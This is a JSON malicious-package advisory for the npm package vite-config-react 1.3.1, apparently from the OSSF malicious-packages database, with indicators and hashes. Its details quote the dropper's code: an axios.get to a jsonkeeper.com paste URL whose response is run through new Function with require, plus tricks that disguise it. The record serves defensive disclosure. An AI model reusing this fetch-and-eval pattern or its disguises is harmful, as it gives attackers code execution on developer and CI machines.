{"id":"MAL-2026-5728","summary":"Malicious code in vite-config-react (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552)\nOn `require`/`import` of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js, which runs an IIFE that performs `axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } })`, reads `.data.config` from the response, and executes the returned string via `new Function('require', s)(require)` with a Node `require` constructed through `createRequire(import.meta.url)`. The fetch-and-eval is wrapped in a 5-attempt retry loop with a swallowed try/catch. The dropper additionally shadows the global `process` with a local object whose keys are renamed `DEV_API_KEY`, `DEV_SECRET_KEY`, `DEV_SECRET_VALUE` so the hardcoded URL and header read like ordinary environment-variable lookups, and the wrapper function is named `getCallers` to obscure intent. jsonkeeper.com is an anonymous, mutable paste host with no hash pinning — the operator can swap the executed payload at any time. Any project that imports this package (for example in `vite.config.js`) hands the author arbitrary code execution on the developer's or CI machine with full `require` access.\n","modified":"2026-06-13T04:01:39.754380646Z","published":"2026-06-13T03:04:40Z","database_specific":{"malicious-packages-origins":[{"sha256":"79ca138b0d54ede570dc5fdf43ecaa2f258dcdc0020f80d4bfeb708985c1766a","source":"amazon-inspector","import_time":"2026-06-13T03:48:10.94307621Z","versions":["1.3.1"],"id":"IN-MAL-2026-006278","modified_time":"2026-06-13T03:04:41Z"},{"sha256":"d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552","source":"amazon-inspector","import_time":"2026-06-13T03:48:10.908991108Z","versions":["1.3.1"],"id":"IN-MAL-2026-006277","modified_time":"2026-06-13T03:04:40Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/vite-config-react/v/1.3.1"}],"affected":[{"package":{"name":"vite-config-react","ecosystem":"npm","purl":"pkg:npm/vite-config-react"},"versions":["1.3.1"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"d100938f64c4cc264fd29a4a56d67132ec0d894e860cbfffd4b2fb62f0432422","path":"src/features/extras/config.js","tlsh":"0b01bd8fa1ac140c057013e7bb1be036f662b1ab390381d5775cc7521fb695ca602ede"}],"ips":["104.16.10.34","10.1.0.2"],"package_integrity":[{"hashes":{"sha1":"9b378c94ab42d52c4db2e846469a5a66eb3ffcd7","sha512_sri":"sha512-Sy3nR070BFXXj2wm0QjV3lsALhP2ZWKWAU5qakxstWihAGhtdrC+FFLN1WJzehtadNyXTUU0l1Z7Srv2+AV8KA=="},"filename":"vite-config-react-1.3.1.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-config-react/MAL-2026-5728.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}